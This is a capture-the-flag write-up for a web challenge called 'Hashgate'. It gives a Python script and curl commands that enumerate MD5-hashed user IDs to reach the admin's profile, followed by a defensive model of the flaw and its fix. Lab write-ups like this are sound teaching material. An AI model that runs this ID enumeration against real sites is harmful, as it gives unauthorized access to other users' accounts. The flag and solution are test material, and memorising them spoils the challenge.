Hashgate

Published: March 20, 2026

Description

You have gotten access to an organisation's portal. Submit your email and password, and it redirects you to your profile. But be careful: just because access to the admin isn't directly exposed doesn't mean it's secure. Can you find your way into the admin's profile and capture the flag?

Launch the challenge instance and open the web portal.

Register an account or log in with any credentials to access your profile.

Solution

  1. Step 1: Observe the profile URL structure
    After logging in, look at your profile URL. The portal uses the MD5 hash of your numeric user ID to construct the profile URL -- for example, user ID 3000 maps to MD5 hash e93028bdc1aacdfb3687181f2031765d.
    # Verify: MD5 of 3000
    python3 -c "import hashlib; print(hashlib.md5(b'3000').hexdigest())"
    # Output: e93028bdc1aacdfb3687181f2031765d
    # Your profile URL is something like: /profile/e93028bdc1aacdfb3687181f2031765d
  2. Step 2: Enumerate nearby user IDs to find the admin
    The admin account is assigned a nearby ID. Generate MD5 hashes for IDs around 3000 and probe each profile URL until you find the one containing the flag. The admin is at ID 3019 (MD5: a74c3bae3e13616104c1b25f9da1f11f).
    python3 << 'EOF'
    import hashlib
    import requests

    BASE = "http://<HOST>:<PORT_FROM_INSTANCE>"

    # Hash each candidate ID the same way the portal does and probe its profile page.
    for uid in range(2980, 3050):
        h = hashlib.md5(str(uid).encode()).hexdigest()
        r = requests.get(f"{BASE}/profile/{h}")
        if "picoCTF" in r.text or "admin" in r.text.lower():
            print(f"Found admin at ID {uid}: /profile/{h}")
            print(r.text)
            break
        print(f"ID {uid}: {h} -- not admin")
    EOF
  3. Step 3: Access the admin profile
    The admin is at ID 3019. Navigate to their profile URL to read the flag.
    python3 -c "import hashlib; print(hashlib.md5(b'3019').hexdigest())"
    # Output: a74c3bae3e13616104c1b25f9da1f11f
    curl http://<HOST>:<PORT_FROM_INSTANCE>/profile/a74c3bae3e13616104c1b25f9da1f11f
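Added example, not part of this writeup or of the challenge's own code: a minimal Python model of the portal's profile lookup that shows why an MD5-of-user-ID URL is an insecure direct object reference, and the server-side fix (authorize against the authenticated session, and count denied lookups so an enumeration burst like the one above stands out). The user table, profile text and threshold are constructed.

```python
import hashlib
import hmac
from collections import Counter
from typing import Optional

# Constructed sample user table; the real portal's data is not on the page.
USERS = {
    3000: {"name": "guest", "profile": "Guest profile. Nothing to see here."},
    3019: {"name": "admin", "profile": "Admin profile. The flag would render here."},
}

# Denied lookups per session: ID enumeration produces many misses from one session.
DENIED = Counter()


def profile_slug(uid: int) -> str:
    """The portal's URL scheme as described in the writeup: MD5 of the decimal ID."""
    return hashlib.md5(str(uid).encode()).hexdigest()


def find_uid(slug: str) -> Optional[int]:
    """Map a URL slug back to a user ID, or None if no user has that slug."""
    for uid in USERS:
        if hmac.compare_digest(profile_slug(uid), slug):
            return uid
    return None


def lookup_vulnerable(slug: str) -> Optional[str]:
    """Challenge behaviour: knowing the slug is enough, and slugs are guessable."""
    uid = find_uid(slug)
    return USERS[uid]["profile"] if uid is not None else None


def lookup_hardened(slug: str, session_uid: int) -> Optional[str]:
    """Fix: the slug only selects a record; the logged-in session decides access."""
    uid = find_uid(slug)
    if uid is None or uid != session_uid:
        DENIED[session_uid] += 1  # worth logging: a real user rarely misses
        return None
    return USERS[uid]["profile"]


def suspicious_sessions(threshold: int = 5):
    """Sessions whose denied-lookup count looks like enumeration, not a typo."""
    return [s for s, n in DENIED.items() if n >= threshold]
```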

Flag

picoCTF{h4sh_g4t3_byp4ss3d_...}

Profile URLs are MD5 hashes of numeric user IDs. Guest is ID 3000 (MD5 e93028b...). Enumerate IDs near 3000 -- the admin is at ID 3019 (MD5 a74c3ba...) and their profile displays the flag.